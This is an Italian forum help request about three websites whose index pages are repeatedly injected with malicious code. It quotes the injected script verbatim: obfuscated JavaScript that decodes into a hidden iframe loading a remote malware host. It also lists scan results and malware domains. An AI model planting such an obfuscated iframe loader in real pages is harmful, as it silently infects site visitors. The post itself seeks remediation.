Ho bisogno di voi per "disinfettare" non uno ma ben 3 siti web di un collega!
La pagina index dei tre siti viene modificata ogni 5-6 gg con uno script del tipo
- Codice: Seleziona tutto
<script type="text/javascript">var PpiDSzCPKXgOuTlrAwgO = "OxLgD60OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD32OxLgD119OxLgD105OxLgD100OxLgD116OxLgD104OxLgD61OxLgD34OxLgD52OxLgD56OxLgD48OxLgD34OxLgD32OxLgD104OxLgD101OxLgD105OxLgD103OxLgD104OxLgD116OxLgD61OxLgD34OxLgD54OxLgD48OxLgD34OxLgD32OxLgD115OxLgD114OxLgD99OxLgD61OxLgD34OxLgD104OxLgD116OxLgD116OxLgD112OxLgD58OxLgD47OxLgD47OxLgD104OxLgD105OxLgD116OxLgD45OxLgD115OxLgD101OxLgD110OxLgD100OxLgD101OxLgD114OxLgD115OxLgD46OxLgD99OxLgD110OxLgD47OxLgD102OxLgD105OxLgD110OxLgD100OxLgD47OxLgD105OxLgD110OxLgD46OxLgD99OxLgD103OxLgD105OxLgD63OxLgD49OxLgD49OxLgD34OxLgD32OxLgD115OxLgD116OxLgD121OxLgD108OxLgD101OxLgD61OxLgD34OxLgD98OxLgD111OxLgD114OxLgD100OxLgD101OxLgD114OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD112OxLgD111OxLgD115OxLgD105OxLgD116OxLgD105OxLgD111OxLgD110OxLgD58OxLgD114OxLgD101OxLgD108OxLgD97OxLgD116OxLgD105OxLgD118OxLgD101OxLgD59OxLgD32OxLgD116OxLgD111OxLgD112OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD108OxLgD101OxLgD102OxLgD116OxLgD58OxLgD45OxLgD53OxLgD48OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD59OxLgD32OxLgD102OxLgD105OxLgD108OxLgD116OxLgD101OxLgD114OxLgD58OxLgD112OxLgD114OxLgD111OxLgD103OxLgD105OxLgD100OxLgD58OxLgD68OxLgD88OxLgD73OxLgD109OxLgD97OxLgD103OxLgD101OxLgD84OxLgD114OxLgD97OxLgD110OxLgD115OxLgD102OxLgD111OxLgD114OxLgD109OxLgD46OxLgD77OxLgD105OxLgD99OxLgD114OxLgD111OxLgD115OxLgD111OxLgD102OxLgD116OxLgD46OxLgD65OxLgD108OxLgD112OxLgD104OxLgD97OxLgD40OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD61OxLgD48OxLgD41OxLgD59OxLgD32OxLgD45OxLgD109OxLgD111OxLgD122OxLgD45OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD34OxLgD62OxLgD60OxLgD47OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD62";var lGkBTgNZFqvVgeYzeaPo = PpiDSzCPKXgOuTlrAwgO.split("OxLgD");var xwCrPoiPkPeWVOXoulOA = "";for (var cKVJouISUYHSUKKjyszj=1; cKVJouISUYHSUKKjyszj<lGkBTgNZFqvVgeYzeaPo.length; cKVJouISUYHSUKKjyszj++){xwCrPoiPkPeWVOXoulOA+=String.fromCharCode(lGkBTgNZFqvVgeYzeaPo[cKVJouISUYHSUKKjyszj]);}document.write(xwCrPoiPkPeWVOXoulOA)</script>
Il codice se messo su Virus Total è riconosciuto come:
HTML:IFrame-EJ da Gdata e Avast e come Heuristic.BehavesLike.JS.CodeUnfolding.A da McAfee.
Anche l'euristica di Antivir 9 interviene quando si visita uno dei 3 siti infettati proponendo di negare l'accesso alla pagina.
I 3 siti vengono inseririti in black list da Google che scansionandoli dice:
SITO 1
Delle 2 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-05-19.
Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Il software dannoso è presente in 3 domini, tra cui hifgejig.con/, traffics-inspector.con/, silzefos.con/.
2 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi traffics-inspector.con/, silzefos.con/.
This site was hosted on 1 network(s) including AS12363 (DADA).
SITO 2
Delle 1 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-06-21.
Il software dannoso è presente in 2 domini, tra cui amateuralluremovies.net/, hit-senders.con/.
1 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi hit-senders.con/.
This site was hosted on 1 network(s) including AS31034 (ARUBA).
SITO 3
Al momento sembra pulito!
Escludo subito un virus sull'hosting in quanto sono 3 hosting diversi (Aruba, Register, Altervista) e mi pare improbabile che siano tutti e 3 infetti no?
Il pc utilizzato per effettuare trasferimenti FTP (Filezilla) è stato recentemente formattatato e risulta pulito dalle varie scansioni effettuate (Antivir, SuperAntiSpyware, Malware AntiBytes). I siti però sono stati infettati prima della formattazione; è probabile magari che nel pc ci fosse il virus che ha infettato i 3 siti?
Nei 3 siti in questione non ci sono script se non quello di shinystat che è l'unica cosa in comune.
Altra cosa in comune sono dei semplici link ad altri siti; alcuni li ho controllati facendoli scansionare da Google e sono OK.
Se si prova a togliere quella stringa che infetta le index (le altre pagine sono ok) passa qualche giorno e il problema si ripresenta anche se nel frattempo non ci sono stati accessi FTP.
Qualche idea ragazzi? Se volete vi posto l'indirizzo dei 3 siti.
Grazie a tutti.